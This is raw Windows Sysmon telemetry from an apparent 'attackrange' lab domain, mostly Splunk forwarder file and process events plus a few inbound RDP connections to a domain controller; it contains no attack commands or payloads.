AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57359-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808927Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:37.284{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C5ABF6DB2839DC6625CA48BB605F298,SHA256=BEA39F5EDB871FFAAE16E4676CF846E7AEDCD26E49C8202161AE241A1C66B354,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051884Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:30.896{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse89.248.165.74recyber.net2031-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001051883Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:38.598{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=FB4B3E9E9EF39D3B8F33BCB6BFB7B8FB,SHA256=13BA1278614F201BFEAF1BF605D88D782B6117B825C80CDD0F4552B5B8827375,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051882Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:38.267{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08FD11709F98C042E7AF44C3884E780C,SHA256=AE158B9FC70F30175699549F5AB76A282A9AEE1E19FBBF7E922F0883147A575F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808929Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:38.300{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C022EA7D8D9398745A25DF5843904407,SHA256=91E422A1C8FFA569AE436ACF85A1AAA6EBA69988563FEDDF7922F04D80E1E53A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051887Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:39.551{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=50D8D41D90B6D79FD064BD9E6B5872DC,SHA256=92E485E050C6EC66A4C3A6E86571EFFDD7EA4700A8C56D508895EBA6A4615947,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051886Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:39.551{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0BD4BE720981E99E7BB197975454D34D,SHA256=1D25E1B996F0F6254F4423567FEDFDE914E7C1E57561EBDC2356DEC9F3F36194,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051885Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:39.282{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31144E313C16EFFF83F9FA3F733A01B3,SHA256=5DAAB570398F6A84C63B431BA54F22E8D9A6B00E8CD336DE538850F4D1F9F223,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808930Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:39.300{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC9886626D5A1787247E6601A7FCAF13,SHA256=900A65B1F4396DCB47A276B576A538B5D377E71DA3FFF0C895436E47EA245A0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808931Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:40.347{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75B48D75AC19CE10DD02AE4271FDDAA5,SHA256=DAC22BACF72A3A59CF3F59042BB0E5090F270C4B490DD7515A67529F0408FB51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051888Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:40.312{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27606DC17936B2D7477873B4580F4BDB,SHA256=E34A27A6EF4CB1C720830801120B11AB732E1D1B0E0343F3933A8C7EC769F76C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808933Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:40.354{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57360-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808932Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:41.393{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4A9BFC6897A681446C55CECA3D1FF00,SHA256=F09CC3299EFB6A23019146F1D90B03DA2B8B43A7DBC61E43EF9099B17376B3BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051889Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:41.314{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CC7380069CBA651959C94BC906D19FC,SHA256=DB5F2A4654DC694BA52C2031A9D7DC3A17AA42635EC34D024425F52420113701,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808934Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:42.425{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CABBC537C577FDC00B5870A9D450DD1,SHA256=09E49B226B598ACF613870D77667CAB8F8071A041F277FDCB6753E342C07CC00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051890Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:42.331{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B9615B6CB4A477B8EBE033380F01E56,SHA256=95B4FCA8224141B9D154A1A6AE74EA0E35A3A6C828958C649DD89D3555536EF4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808935Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:43.472{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D49371A876CA84FFBAACD0AD1E5E631,SHA256=A7593E8C00635B96C44E089B21A95579D02467161EF1906776EC6FCD09510042,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051892Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:43.349{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EFCCFD2702CB24581663D078B808B36,SHA256=38BAD17AC7F5B961E6CDD23E4CE5616E3B01D1F79DEA4BFF84FD1A24AFDB15DD,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051891Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:34.602{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51136-false10.0.1.12-8000- 23542300x8000000000000000808936Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:44.503{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05F55C6C3B228B0383DC1D757EE77DB7,SHA256=693C43565C943D20D3C971580E7B28438B6D8656C13254D2886E813DA038B8C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051893Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:44.379{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A23EC47869058EA481F7A33071ACF60D,SHA256=5E3C78FAECD2930DA9C53EFE2E1E12E64C8427DB51500130E11A881A6751DB0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808937Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:45.534{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F2E3E31C68217DE7A72A3F9383CDD8A,SHA256=9F10FF0BD0A3E75D239F8EA53A82406773F33959B39BC99A28A4A247C3116028,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051897Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:45.410{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E2C31FFB09D3A31F9DFFF6AB251627F,SHA256=466F54299A293B4AF56403B7DDCFD7E08C7AE8B67E48AE7A61DD290A9143EB6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051896Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:45.247{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2F8E17B0705ADBB565D140CB9A51045B,SHA256=619946971D449B60585F3A61F10D29A43D905A6959A367656C5E7CEF01826FF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051895Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:45.247{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=50D8D41D90B6D79FD064BD9E6B5872DC,SHA256=92E485E050C6EC66A4C3A6E86571EFFDD7EA4700A8C56D508895EBA6A4615947,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051894Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:37.214{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse84.242.35.58static-host-84-242-35-58.awasr.om1219-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x8000000000000000808938Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:46.534{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A58A43A3B2CFBB192B9EF8F453A279F9,SHA256=6C1584E5B3053117E48FB7B623DEC84DDB354C9287DC67D4672DE2B399303B10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051898Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:46.430{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3736B0F26024EF113C2A8A2789C9CCA0,SHA256=0A1B328AD8409AA9C5814F23C34F8ED1EA13438E2A8F8C739A36CC813E73F208,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808940Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:46.354{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57361-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808939Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:47.565{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A824DAC505600A0FC5466C621AE282F2,SHA256=EF1BC01FEB4FF742896347BAB7B863BF0C3A8094B51B09601B247F47CD392437,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051899Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:47.445{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68AC9F60F8CB593438ADFA0E7B91C99E,SHA256=575AF23CDE8093A923290EF6D4B94F0DDCDC3793F6FC88AA32F8B8755F247CA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051901Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:48.461{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FCBC2E95FC63D8D3BEC39ADA799EA18,SHA256=EE8F33862C8BCDE63D706667022AC0EB5E0723E6DC2CC3237FEAA978C2CF855D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808941Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:48.566{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B80D924BAFC35F337BC45764C3E3E894,SHA256=B91334CDBE5D87F602804911C27DC3C031DA3D2C88A9DE83ED2A3A25ACF7C6F1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051900Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:39.682{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51137-false10.0.1.12-8000- 23542300x8000000000000000808942Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:49.581{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F73B910E5D25F37C40E91EF2803B5F54,SHA256=123C9EB46441D96FA223B412D4F6EAE707B12B151AA0E8A3EB3AD63F245EEF6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051902Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:49.476{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62CC0561F5EBCE2D35FB98B0EA8AF5E9,SHA256=5B070596730681D39245CEF296881BCE0FC56E92091657B9095504D9EF03DEE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808943Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:50.612{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC51AE1D160F7DE334DC127945E57151,SHA256=DDFACCE2DB16A6D4B0F9E4DCD8BD5623E811376090BD124E06B1DA9E9D297C1C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051912Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:50.650{466BC892-F676-60EB-997D-00000000CF01}86489616C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051911Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:50.496{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A78D825C0CD18B54907C1EB0E0208AF,SHA256=CC56B47A8B872632008156AF63EA2C439989079A82FB872255B514E49190DDF2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051910Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:50.307{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F676-60EB-997D-00000000CF01}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051909Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:50.307{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051908Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:50.307{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051907Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:50.307{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051906Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:50.307{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051905Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:50.307{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F676-60EB-997D-00000000CF01}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051904Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:50.307{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F676-60EB-997D-00000000CF01}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 